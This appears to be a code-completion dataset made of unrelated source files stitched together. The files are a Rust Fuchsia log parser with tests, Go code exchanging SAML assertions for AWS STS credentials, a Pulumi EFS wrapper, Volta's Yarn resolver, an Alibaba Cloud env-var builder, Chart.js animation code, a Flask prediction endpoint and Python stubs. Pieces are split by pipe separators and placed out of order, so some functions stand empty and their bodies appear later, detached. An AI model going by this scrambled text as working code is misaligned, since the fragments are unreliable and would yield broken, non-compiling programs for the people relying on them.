pub(super) fn from_logger(bytes: &[u8]) -> Result<Self, StreamError> {
if bytes.len() < MIN_PACKET_SIZE {
return Err(StreamError::ShortRead { len: bytes.len() });
}
let terminator = bytes[bytes.len() - 1];
if terminator != 0 {
return Err(StreamError::NotNullTerminated { terminator });
}
let pid = LittleEndian::read_u64(&bytes[..8]);
let tid = LittleEndian::read_u64(&bytes[8..16]);
let time = zx::Time::from_nanos(LittleEndian::read_i64(&bytes[16..24]));
let severity = LittleEndian::read_i32(&bytes[24..28]);
let dropped_logs = LittleEndian::read_u32(&bytes[28..METADATA_SIZE]) as usize;
// start reading tags after the header
let mut cursor = METADATA_SIZE;
let mut tag_len = bytes[cursor] as usize;
let mut tags = Vec::new();
while tag_len != 0 {
if tags.len() == MAX_TAGS {
return Err(StreamError::TooManyTags);
}
if tag_len > MAX_TAG_LEN - 1 {
return Err(StreamError::TagTooLong { index: tags.len(), len: tag_len });
}
if (cursor + tag_len + 1) > bytes.len() {
return Err(StreamError::OutOfBounds);
}
let tag_start = cursor + 1;
let tag_end = tag_start + tag_len;
let tag = str::from_utf8(&bytes[tag_start..tag_end])?;
tags.push(tag.to_owned());
cursor = tag_end;
tag_len = bytes[cursor] as usize;
}
let msg_start = cursor + 1;
let mut msg_end = cursor + 1;
while msg_end < bytes.len() {
if bytes[msg_end] == 0 {
let contents = str::from_utf8(&bytes[msg_start..msg_end])?.to_owned();
return Ok(Self {
size: cursor + contents.len() + 1,
tags,
contents,
pid,
tid,
time,
severity,
dropped_logs,
});
}
msg_end += 1;
}
Err(StreamError::OutOfBounds)
}
/// Convert this `Message` to a FIDL representation suitable for sending to `LogListenerSafe`.
pub fn for_listener(&self) -> LogMessage {
LogMessage {
pid: self.pid,
tid: self.tid,
time: self.time.into_nanos(),
severity: self.severity,
dropped_logs: self.dropped_logs as _,
tags: self.tags.clone(),
msg: self.contents.clone(),
}
}
}
#[allow(non_camel_case_types)]
type fx_log_severity_t = c_int;
#[repr(C)]
#[derive(Debug, Copy, Clone, Default, Eq, PartialEq)]
pub struct fx_log_metadata_t {
pub pid: zx::sys::zx_koid_t,
pub tid: zx::sys::zx_koid_t,
pub time: zx::sys::zx_time_t,
pub severity: fx_log_severity_t,
pub dropped_logs: u32,
}
#[repr(C)]
#[derive(Clone)]
pub struct fx_log_packet_t {
pub metadata: fx_log_metadata_t,
// Contains concatenated tags and message and a null terminating character at
// the end.
// char(tag_len) + "tag1" + char(tag_len) + "tag2\0msg\0"
pub data: [c_char; MAX_DATAGRAM_LEN - METADATA_SIZE],
}
impl Default for fx_log_packet_t {
fn default() -> fx_log_packet_t {
fx_log_packet_t {
data: [0; MAX_DATAGRAM_LEN - METADATA_SIZE],
metadata: Default::default(),
}
}
}
#[cfg(test)]
impl fx_log_packet_t {
/// This struct has no padding bytes, but we can't use zerocopy because it needs const
/// generics to support arrays this large.
pub(super) fn as_bytes(&self) -> &[u8] {
unsafe {
std::slice::from_raw_parts(
(self as *const Self) as *const u8,
mem::size_of::<fx_log_packet_t>(),
)
}
}
pub(super) fn fill_data(&mut self, region: std::ops::Range<usize>, with: c_char) {
self.data[region].iter_mut().for_each(|c| *c = with);
}
}
#[cfg(test)]
mod tests {
use super::*;
#[repr(C, packed)]
pub struct fx_log_metadata_t_packed {
pub pid: zx::sys::zx_koid_t,
pub tid: zx::sys::zx_koid_t,
pub time: zx::sys::zx_time_t,
pub severity: fx_log_severity_t,
pub dropped_logs: u32,
}
#[repr(C, packed)]
pub struct fx_log_packet_t_packed {
pub metadata: fx_log_metadata_t_packed,
/// Contains concatenated tags and message and a null terminating character at the end.
/// `char(tag_len) + "tag1" + char(tag_len) + "tag2\0msg\0"`
pub data: [c_char; MAX_DATAGRAM_LEN - METADATA_SIZE],
}
#[test]
fn abi_test() {
assert_eq!(METADATA_SIZE, 32);
assert_eq!(MAX_TAGS, 5);
assert_eq!(MAX_TAG_LEN, 64);
assert_eq!(mem::size_of::<fx_log_packet_t>(), MAX_DATAGRAM_LEN);
// Test that there is no padding
assert_eq!(mem::size_of::<fx_log_packet_t>(), mem::size_of::<fx_log_packet_t_packed>());
assert_eq!(mem::size_of::<fx_log_metadata_t>(), mem::size_of::<fx_log_metadata_t_packed>());
}
fn test_packet() -> fx_log_packet_t {
let mut packet: fx_log_packet_t = Default::default();
packet.metadata.pid = 1;
packet.metadata.tid = 2;
packet.metadata.time = 3;
packet.metadata.severity = -1;
packet.metadata.dropped_logs = 10;
packet
}
#[test]
fn short_reads() {
let packet = test_packet();
let one_short = &packet.as_bytes()[..METADATA_SIZE];
let two_short = &packet.as_bytes()[..METADATA_SIZE - 1];
assert_eq!(Message::from_logger(one_short), Err(StreamError::ShortRead { len: 32 }));
assert_eq!(Message::from_logger(two_short), Err(StreamError::ShortRead { len: 31 }));
}
#[test]
fn unterminated() {
let mut packet = test_packet();
let end = 9;
packet.data[end] = 1;
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + end];
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::NotNullTerminated { terminator: 1 }));
}
#[test]
fn tags_no_message() {
let mut packet = test_packet();
let end = 12;
packet.data[0] = end as c_char - 1;
packet.fill_data(1..end, 'A' as _);
packet.data[end] = 0;
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + end]; // omit null-terminated
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::OutOfBounds));
}
#[test]
fn tags_with_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
packet.data[a_end] = 0; // terminate tags
let b_start = a_start + a_count + 1;
let b_count = 5;
let b_end = b_start + b_count;
packet.fill_data(b_start..b_end, 'B' as _);
let data_size = b_start + b_count;
let buffer = &packet.as_bytes()[..METADATA_SIZE + data_size + 1]; // null-terminate message
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + data_size,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![String::from("AAAAAAAAAAA")],
contents: String::from("BBBBB"),
}
);
}
#[test]
fn two_tags_no_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
let b_start = a_end + 1;
let b_count = 5;
let b_end = b_start + b_count;
packet.data[a_end] = b_count as c_char;
packet.fill_data(b_start..b_end, 'B' as _);
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + b_end];
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::OutOfBounds));
}
#[test]
fn two_tags_with_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
let b_start = a_end + 1;
let b_count = 5;
let b_end = b_start + b_count;
packet.data[a_end] = b_count as c_char;
packet.fill_data(b_start..b_end, 'B' as _);
let c_start = b_end + 1;
let c_count = 5;
let c_end = c_start + c_count;
packet.fill_data(c_start..c_end, 'C' as _);
let data_size = c_start + c_count;
let buffer = &packet.as_bytes()[..METADATA_SIZE + data_size + 1]; // null-terminated
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + data_size,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![String::from("AAAAAAAAAAA"), String::from("BBBBB")],
contents: String::from("CCCCC"),
}
);
}
#[test]
fn max_tags_with_message() {
let mut packet = test_packet();
let tags_start = 1;
let tag_len = 2;
let tag_size = tag_len + 1; // the length-prefix byte
for tag_num in 0..MAX_TAGS {
let start = tags_start + (tag_size * tag_num);
let end = start + tag_len;
packet.data[start - 1] = tag_len as c_char;
let ascii = 'A' as c_char + tag_num as c_char;
packet.fill_data(start..end, ascii);
}
let msg_start = tags_start + (tag_size * MAX_TAGS);
let msg_len = 5;
let msg_end = msg_start + msg_len;
let msg_ascii = 'A' as c_char + MAX_TAGS as c_char;
packet.fill_data(msg_start..msg_end, msg_ascii);
let min_buffer = &packet.as_bytes()[..METADATA_SIZE + msg_end + 1]; // null-terminated
let full_buffer = &packet.as_bytes()[..];
let min_parsed = Message::from_logger(min_buffer).unwrap();
let full_parsed = Message::from_logger(full_buffer).unwrap();
let expected_message = Message {
size: METADATA_SIZE + msg_end,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
contents: String::from_utf8(vec![msg_ascii as u8; msg_len]).unwrap(),
tags: (0..MAX_TAGS as _)
.map(|tag_num| {
String::from_utf8(vec![('A' as c_char + tag_num) as u8; tag_len]).unwrap()
})
.collect(),
};
assert_eq!(min_parsed, expected_message);
assert_eq!(full_parsed, expected_message);
}
#[test]
fn max_tags() {
let mut packet = test_packet();
let tags_start = 1;
let tag_len = 2;
let tag_size = tag_len + 1; // the length-prefix byte
for tag_num in 0..MAX_TAGS {
let start = tags_start + (tag_size * tag_num);
let end = start + tag_len;
packet.data[start - 1] = tag_len as c_char;
let ascii = 'A' as c_char + tag_num as c_char;
packet.fill_data(start..end, ascii);
}
let msg_start = tags_start + (tag_size * MAX_TAGS);
let buffer_missing_terminator = &packet.as_bytes()[..METADATA_SIZE + msg_start];
assert_eq!(
Message::from_logger(buffer_missing_terminator),
Err(StreamError::OutOfBounds),
"can't parse an empty message without a nul terminator"
);
let buffer = &packet.as_bytes()[..METADATA_SIZE + msg_start + 1]; // null-terminated
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + msg_start,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: (0..MAX_TAGS as _)
.map(|tag_num| String::from_utf8(vec![('A' as c_char + tag_num) as u8; 2])
.unwrap())
.collect(),
contents: String::new(),
}
);
}
#[test]
fn no_tags_with_message() {
let mut packet = test_packet();
packet.data[0] = 0;
packet.data[1] = 'A' as _;
packet.data[2] = 'A' as _; // measured size ends here
packet.data[3] = 0;
let buffer = &packet.as_bytes()[..METADATA_SIZE + 4]; // 0 tag size + 2 byte message + null
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + 3,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![],
contents: String::from("AA"),
}
);
}
}
awssts.go | // Copyright 2021 Masaya Suzuki
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package awssts
import (
"context"
"encoding/base64"
"encoding/xml"
"fmt"
"strconv"
"strings"
"time"
"github.com/aws/aws-sdk-go-v2/aws"
"github.com/aws/aws-sdk-go-v2/service/sts"
"github.com/crewjam/saml"
"gopkg.in/ini.v1"
)
// RoleProviderPair is a pair in SAML Role Attribute.
//
// See
// https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_saml_assertions.html#saml_role-attribute.
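//
// A typical attribute value looks like (hypothetical ARNs):
// "arn:aws:iam::123456789012:role/Admin,arn:aws:iam::123456789012:saml-provider/MyIdP"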
type RoleProviderPair struct {
RoleARN string
PrincipalARN string
}
type SAMLAttributes struct {
Roles []RoleProviderPair
SessionDuration time.Duration
}
type AWSAuthRequest struct {
PrincipalARN string
RoleARN string
SAMLAssertion string
SessionDuration time.Duration
}
type AWSAuthResponse struct {
AWSAccessKeyID string
AWSSecretAccessKey string
AWSSessionToken string
}
func ParseBase64EncodedSAMLResponse(s string) (*SAMLAttributes, error) {
bs, err := base64.StdEncoding.DecodeString(s)
if err != nil {
return nil, fmt.Errorf("cannot decode the base64 encoded SAML assertion: %v", err)
}
return ParseSAMLResponse(bs)
}
func ParseSAMLResponse(bs []byte) (*SAMLAttributes, error) {
var response saml.Response
if err := xml.Unmarshal(bs, &response); err != nil {
return nil, fmt.Errorf("cannot parse the SAML response: %v", err)
}
var ret SAMLAttributes
for _, stmt := range response.Assertion.AttributeStatements {
for _, attr := range stmt.Attributes {
var err error
switch attr.Name {
case "https://aws.amazon.com/SAML/Attributes/SessionDuration":
ret.SessionDuration, err = parseSessionDurationValue(attr.Values)
if err != nil {
return nil, err
}
case "https://aws.amazon.com/SAML/Attributes/Role":
ret.Roles, err = parseRoleValue(attr.Values)
if err != nil {
return nil, err
}
}
}
}
return &ret, nil
}
func parseSessionDurationValue(values []saml.AttributeValue) (time.Duration, error) {
if len(values) != 1 {
return time.Duration(0), fmt.Errorf("SessionDuration should have only one value")
}
sec, err := strconv.ParseInt(values[0].Value, 10, 64)
if err != nil {
return time.Duration(0), fmt.Errorf("SessionDuration %s cannot be parsed as an integer: %v", values[0].Value, err)
}
if sec < 0 {
return time.Duration(0), fmt.Errorf("SessionDuration %d must be non-negative", sec)
}
return time.Duration(sec) * time.Second, nil
}
func parseRoleValue(values []saml.AttributeValue) ([]RoleProviderPair, error) {
var ret []RoleProviderPair
for _, value := range values {
ss := strings.Split(value.Value, ",")
if len(ss) != 2 {
return nil, fmt.Errorf("A role-provider pair should have exactly two comma-separated elements")
}
ret = append(ret, RoleProviderPair{
RoleARN: ss[0],
PrincipalARN: ss[1],
})
}
return ret, nil
}
func AWSSTSExchange(ctx context.Context, req *AWSAuthRequest) (*AWSAuthResponse, error) {
input := &sts.AssumeRoleWithSAMLInput{
PrincipalArn: aws.String(req.PrincipalARN),
RoleArn: aws.String(req.RoleARN),
SAMLAssertion: aws.String(req.SAMLAssertion),
}
if req.SessionDuration != time.Duration(0) {
input.DurationSeconds = aws.Int32(int32(req.SessionDuration.Seconds()))
}
output, err := sts.New(sts.Options{Region: "aws-global"}).AssumeRoleWithSAML(ctx, input)
if err != nil {
return nil, fmt.Errorf("AWS STS returns an error: %v", err)
}
return &AWSAuthResponse{
AWSAccessKeyID: *output.Credentials.AccessKeyId,
AWSSecretAccessKey: *output.Credentials.SecretAccessKey,
AWSSessionToken: *output.Credentials.SessionToken,
}, nil
}
func UpdateCredentialFile(fp, profileName string, resp *AWSAuthResponse) error {
config, err := ini.Load(fp)
if err != nil {
return fmt.Errorf("cannot parse the existing config: %v", err)
}
section := config.Section(profileName)
section.DeleteKey("aws_access_key_id")
section.DeleteKey("aws_secret_access_key")
section.DeleteKey("aws_session_token")
section.NewKey("aws_access_key_id", resp.AWSAccessKeyID)
section.NewKey("aws_secret_access_key", resp.AWSSecretAccessKey)
section.NewKey("aws_session_token", resp.AWSSessionToken)
if err := config.SaveTo(fp); err != nil {
return fmt.Errorf("cannot save the credential: %v", err)
}
return nil
}
getAccessPoints.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package efs
import (
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Provides information about multiple Elastic File System (EFS) Access Points.
//
// ## Example Usage
//
// ```go
// package main
//
// import (
// "github.com/pulumi/pulumi-aws/sdk/v2/go/aws/efs"
// "github.com/pulumi/pulumi/sdk/v2/go/pulumi"
// )
//
// func main() {
// pulumi.Run(func(ctx *pulumi.Context) error {
// _, err := efs.GetAccessPoints(ctx, &efs.GetAccessPointsArgs{
// FileSystemId: "fs-12345678",
// }, nil)
// if err != nil {
// return err
// }
// return nil
// })
// }
// ```
func GetAccessPoints(ctx *pulumi.Context, args *GetAccessPointsArgs, opts ...pulumi.InvokeOption) (*GetAccessPointsResult, error) {
var rv GetAccessPointsResult
err := ctx.Invoke("aws:efs/getAccessPoints:getAccessPoints", args, &rv, opts...)
if err != nil {
return nil, err
}
return &rv, nil
}
// A collection of arguments for invoking getAccessPoints.
type GetAccessPointsArgs struct {
// EFS File System identifier.
FileSystemId string `pulumi:"fileSystemId"`
}
// A collection of values returned by getAccessPoints.
type GetAccessPointsResult struct {
// Set of Amazon Resource Names (ARNs).
Arns []string `pulumi:"arns"`
FileSystemId string `pulumi:"fileSystemId"`
// The provider-assigned unique ID for this managed resource.
Id string `pulumi:"id"`
// Set of identifiers.
Ids []string `pulumi:"ids"`
} | |
resolve.rs | //! Provides resolution of Yarn requirements into specific versions
use std::env;
use super::super::registry::{
fetch_npm_registry, public_registry_index, PackageDetails, PackageIndex,
};
use super::super::registry_fetch_error;
use super::metadata::{RawYarnIndex, YarnIndex};
use crate::error::{Context, ErrorKind, Fallible};
use crate::hook::{RegistryFormat, YarnHooks};
use crate::session::Session;
use crate::style::progress_spinner;
use crate::version::{parse_version, VersionSpec, VersionTag};
use attohttpc::Response;
use log::debug;
use semver::{Version, VersionReq};
pub fn resolve(matching: VersionSpec, session: &mut Session) -> Fallible<Version> {
let hooks = session.hooks()?.yarn();
match matching {
VersionSpec::Semver(requirement) => resolve_semver(requirement, hooks),
VersionSpec::Exact(version) => Ok(version),
VersionSpec::None => resolve_tag(VersionTag::Latest, hooks),
VersionSpec::Tag(tag) => resolve_tag(tag, hooks),
}
}
fn resolve_tag(tag: VersionTag, hooks: Option<&YarnHooks>) -> Fallible<Version> {
// This triage is complicated because we need to maintain the legacy behavior of hooks
// First, if the tag is 'latest' and we have a 'latest' hook, we use the old behavior
// Next, if the tag is 'latest' and we _do not_ have a 'latest' hook, we use the new behavior
// Next, if the tag is _not_ 'latest' and we have an 'index' hook, we show an error since
// the previous behavior did not support generic tags
// Finally, we don't have any relevant hooks, so we can use the new behavior
match (tag, hooks) {
(
VersionTag::Latest,
Some(&YarnHooks {
latest: Some(ref hook),
..
}),
) => {
debug!("Using yarn.latest hook to determine latest-version URL");
// Note: Yarn 3 does not use the latest-version endpoint.
resolve_latest_legacy(hook.resolve("latest-version")?)
}
(VersionTag::Latest, _) => resolve_custom_tag(VersionTag::Latest.to_string()),
(tag, Some(&YarnHooks { index: Some(_), .. })) => Err(ErrorKind::YarnVersionNotFound {
matching: tag.to_string(),
}
.into()),
(tag, _) => resolve_custom_tag(tag.to_string()),
}
}
fn resolve_semver(matching: VersionReq, hooks: Option<&YarnHooks>) -> Fallible<Version> {
// For semver, the triage is less complicated: The previous behavior _always_ used
// the 'index' hook, so we can check for that to decide which behavior to use.
//
// If the user specifies a format for the registry, we use that. Otherwise Github format
// is the default legacy behavior.
if let Some(&YarnHooks {
index: Some(ref hook),
..
}) = hooks
{
debug!("Using yarn.index hook to determine yarn index URL");
match hook.format {
RegistryFormat::Github => resolve_semver_legacy(matching, hook.resolve("releases")?),
RegistryFormat::Npm => resolve_semver_npm(matching, hook.resolve("")?),
}
} else {
resolve_semver_from_registry(matching)
}
}
fn fetch_yarn_index(package: &str) -> Fallible<(String, PackageIndex)> {
let url = public_registry_index(package);
fetch_npm_registry(url, "Yarn")
}
fn resolve_custom_tag(tag: String) -> Fallible<Version> {
if env::var_os("VOLTA_FEATURE_YARN_3").is_some() {
// first try yarn2+, which uses "@yarnpkg/cli-dist" instead of "yarn"
let (url, mut index) = fetch_yarn_index("@yarnpkg/cli-dist")?;
if let Some(version) = index.tags.remove(&tag) {
debug!("Found yarn@{} matching tag '{}' from {}", version, tag, url);
if version.major == 2 {
return Err(ErrorKind::Yarn2NotSupported.into());
}
return Ok(version);
}
debug!(
"Did not find yarn matching tag '{}' from @yarnpkg/cli-dist",
tag
);
}
let (url, mut index) = fetch_yarn_index("yarn")?;
match index.tags.remove(&tag) {
Some(version) => {
debug!("Found yarn@{} matching tag '{}' from {}", version, tag, url);
Ok(version)
}
None => Err(ErrorKind::YarnVersionNotFound { matching: tag }.into()),
}
}
fn resolve_latest_legacy(url: String) -> Fallible<Version> {
let response_text = attohttpc::get(&url)
.send()
.and_then(Response::error_for_status)
.and_then(Response::text)
.with_context(|| ErrorKind::YarnLatestFetchError {
from_url: url.clone(),
})?;
debug!("Found yarn latest version ({}) from {}", response_text, url);
parse_version(response_text)
}
fn resolve_semver_from_registry(matching: VersionReq) -> Fallible<Version> {
if env::var_os("VOLTA_FEATURE_YARN_3").is_some() {
// first try yarn2+, which uses "@yarnpkg/cli-dist" instead of "yarn"
let (url, index) = fetch_yarn_index("@yarnpkg/cli-dist")?;
let matching_entries: Vec<PackageDetails> = index
.entries
.into_iter()
.filter(|PackageDetails { version, .. }| matching.matches(version))
.collect();
if !matching_entries.is_empty() {
let details_opt = matching_entries
.iter()
.find(|PackageDetails { version, .. }| version.major >= 3);
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
return Ok(details.version.clone());
}
None => {
return Err(ErrorKind::Yarn2NotSupported.into());
}
}
}
debug!(
"Did not find yarn matching requirement '{}' from {}",
matching, url
);
}
let (url, index) = fetch_yarn_index("yarn")?;
let details_opt = index
.entries
.into_iter()
.find(|PackageDetails { version, .. }| matching.matches(version));
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
Ok(details.version)
}
// at this point Yarn is not found in either registry
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
}
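/// Resolves a semver requirement against a GitHub-format release index (the
/// legacy hook behavior).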
fn resolve_semver_legacy(matching: VersionReq, url: String) -> Fallible<Version> {
let spinner = progress_spinner(format!("Fetching registry: {}", url));
let releases: RawYarnIndex = attohttpc::get(&url)
.send()
.and_then(Response::error_for_status)
.and_then(Response::json)
.with_context(registry_fetch_error("Yarn", &url))?;
let index = YarnIndex::from(releases);
let releases = index.entries;
spinner.finish_and_clear();
let version_opt = releases.into_iter().rev().find(|v| matching.matches(v));
match version_opt {
Some(version) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
version, matching, url
);
Ok(version)
}
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
}
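/// Resolves a semver requirement against an npm-format registry supplied by an
/// `index` hook.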
fn resolve_semver_npm(matching: VersionReq, url: String) -> Fallible<Version> {
let (url, index) = fetch_npm_registry(url, "Yarn")?;
let details_opt = index
.entries
.into_iter()
.find(|PackageDetails { version, .. }| matching.matches(version));
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
Ok(details.version)
}
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
} | ||
env.go | package shell
import (
"fmt"
"github.com/aliyun/saml2alibabacloud/pkg/alibabacloudconfig"
"github.com/aliyun/saml2alibabacloud/pkg/cfg"
"github.com/aliyun/saml2alibabacloud/pkg/flags"
)
// BuildEnvVars build an array of env vars in the format required for exec
func BuildEnvVars(alibabacloudCreds *alibabacloudconfig.AliCloudCredentials, account *cfg.IDPAccount, execFlags *flags.LoginExecFlags) []string {
environmentVars := []string{
fmt.Sprintf("ALICLOUD_ASSUME_ROLE_SESSION_NAME=%s", alibabacloudCreds.AliCloudSessionToken),
fmt.Sprintf("ALICLOUD_SECURITY_TOKEN=%s", alibabacloudCreds.AliCloudSecurityToken),
fmt.Sprintf("ALICLOUD_ACCESS_KEY=%s", alibabacloudCreds.AliCloudAccessKey),
fmt.Sprintf("ALICLOUD_SECRET_KEY=%s", alibabacloudCreds.AliCloudSecretKey),
}
if execFlags.ExecProfile == "" {
// Only set profile env vars if we haven't already assumed a role via a profile | } | environmentVars = append(environmentVars, fmt.Sprintf("ALICLOUD_PROFILE=%s", account.Profile))
}
return environmentVars |
core.animation.js | /* global window: false */
'use strict';
var defaults = require('./core.defaults');
var Element = require('./core.element');
var helpers = require('../helpers/index');
defaults._set('global', {
animation: {
duration: 0,
easing: 'easeOutQuart',
onProgress: helpers.noop,
onComplete: helpers.noop
}
});
module.exports = function(Chart) {
Chart.Animation = Element.extend({
chart: null, // the animation associated chart instance
currentStep: 0, // the current animation step
numSteps: 60, // default number of steps
easing: '', // the easing to use for this animation
render: null, // render function used by the animation service
onAnimationProgress: null, // user specified callback to fire on each step of the animation
onAnimationComplete: null, // user specified callback to fire when the animation finishes
});
Chart.animationService = {
frameDuration: 17,
animations: [],
dropFrames: 0,
request: null,
/**
* @param {Chart} chart - The chart to animate.
* @param {Chart.Animation} animation - The animation that we will animate.
* @param {Number} duration - The animation duration in ms.
* @param {Boolean} lazy - if true, the chart is not marked as animating to enable more responsive interactions
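		 * Note: if an animation is already queued for the chart, it is replaced instead of being queued twice.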
*/
addAnimation: function(chart, animation, duration, lazy) {
var animations = this.animations;
var i, ilen;
animation.chart = chart;
if (!lazy) {
chart.animating = true;
}
for (i = 0, ilen = animations.length; i < ilen; ++i) {
if (animations[i].chart === chart) {
animations[i] = animation;
return;
}
}
animations.push(animation);
// If there are no animations queued, manually kickstart a digest, for lack of a better word
if (animations.length === 1) {
this.requestAnimationFrame();
}
},
cancelAnimation: function(chart) {
var index = helpers.findIndex(this.animations, function(animation) {
return animation.chart === chart;
});
if (index !== -1) {
this.animations.splice(index, 1);
chart.animating = false;
}
},
requestAnimationFrame: function() {
var me = this;
if (me.request === null) {
// Skip animation frame requests until the active one is executed.
// This can happen when processing mouse events, e.g. 'mousemove'
// and 'mouseout' events will trigger multiple renders.
me.request = helpers.requestAnimFrame.call(window, function() {
me.request = null;
me.startDigest();
});
}
},
/**
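		 * Runs one tick of the animation loop: advances all active animations
		 * (catching up on dropped frames) and schedules the next frame while
		 * any animations remain.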
* @private
*/
startDigest: function() {
var me = this;
var startTime = Date.now();
var framesToDrop = 0;
if (me.dropFrames > 1) {
framesToDrop = Math.floor(me.dropFrames);
me.dropFrames = me.dropFrames % 1;
}
me.advance(1 + framesToDrop);
var endTime = Date.now();
me.dropFrames += (endTime - startTime) / me.frameDuration;
// Do we have more stuff to animate?
if (me.animations.length > 0) {
me.requestAnimationFrame();
}
},
/**
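		 * Advances each active animation by 'count' steps, firing its render and
		 * progress callbacks, and removes animations that have reached their
		 * final step.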
* @private
*/
advance: function(count) {
var animations = this.animations;
var animation, chart;
var i = 0;
while (i < animations.length) {
animation = animations[i]; | chart = animation.chart;
animation.currentStep = (animation.currentStep || 0) + count;
animation.currentStep = Math.min(animation.currentStep, animation.numSteps);
helpers.callback(animation.render, [chart, animation], chart);
helpers.callback(animation.onAnimationProgress, [animation], chart);
if (animation.currentStep >= animation.numSteps) {
helpers.callback(animation.onAnimationComplete, [animation], chart);
chart.animating = false;
animations.splice(i, 1);
} else {
++i;
}
}
}
};
/**
* Provided for backward compatibility, use Chart.Animation instead
* @prop Chart.Animation#animationObject
* @deprecated since version 2.6.0
* @todo remove at version 3
*/
Object.defineProperty(Chart.Animation.prototype, 'animationObject', {
get: function() {
return this;
}
});
/**
* Provided for backward compatibility, use Chart.Animation#chart instead
* @prop Chart.Animation#chartInstance
* @deprecated since version 2.6.0
* @todo remove at version 3
*/
Object.defineProperty(Chart.Animation.prototype, 'chartInstance', {
get: function() {
return this.chart;
},
set: function(value) {
this.chart = value;
}
});
}; | |
util.rs | #![cfg(target_pointer_width = "64")]
/// Utilities for integer vectors.
pub mod vec_io;
use crate::broadword;
/// Returns the minimum number of bits needed to represent `x`.
///
/// # Example
///
/// ```
/// use sucds::util::needed_bits;
///
/// assert_eq!(needed_bits(0), 1);
/// assert_eq!(needed_bits(1), 1);
/// assert_eq!(needed_bits(2), 2);
/// assert_eq!(needed_bits(255), 8);
/// assert_eq!(needed_bits(256), 9);
/// ```
pub fn needed_bits(x: usize) -> usize | {
broadword::msb(x).map_or(1, |n| n + 1)
} |
|
app.py | import flask
from flask import Flask,jsonify,request
import json
from data_input import data_in
import numpy as np
import pickle
def load_models():
|
app = Flask(__name__)
@app.route('/predict',methods=['GET'])
def predict():
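    # Expects a JSON body of the form {"input": [...]} and returns the
    # model's prediction for that single row.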
request_json = request.get_json()
x = request_json['input']
x_in = np.array(x).reshape(1,-1)
model = load_models()
prediction = model.predict(x_in)[0]
response = json.dumps({'response': prediction})
return response,200
if __name__ == '__main__':
    app.run(debug=True) | file_name = './models/model_file.p'
with open(file_name,'rb') as pickled:
data = pickle.load(pickled)
model = data['model']
return model |
StatusBarDrawItemEventHandler.py | class StatusBarDrawItemEventHandler(MulticastDelegate,ICloneable,ISerializable):
"""
Represents the method that will handle the System.Windows.Forms.StatusBar.DrawItem event of a System.Windows.Forms.StatusBar.
StatusBarDrawItemEventHandler(object: object,method: IntPtr)
"""
def Instance(self):
""" This function has been arbitrarily put into the stubs"""
return StatusBarDrawItemEventHandler()
def BeginInvoke(self,sender,sbdevent,callback,object):
""" BeginInvoke(self: StatusBarDrawItemEventHandler,sender: object,sbdevent: StatusBarDrawItemEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
pass
def CombineImpl(self,*args):
"""
CombineImpl(self: MulticastDelegate,follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self,*args):
|
def EndInvoke(self,result):
""" EndInvoke(self: StatusBarDrawItemEventHandler,result: IAsyncResult) """
pass
def GetMethodImpl(self,*args):
"""
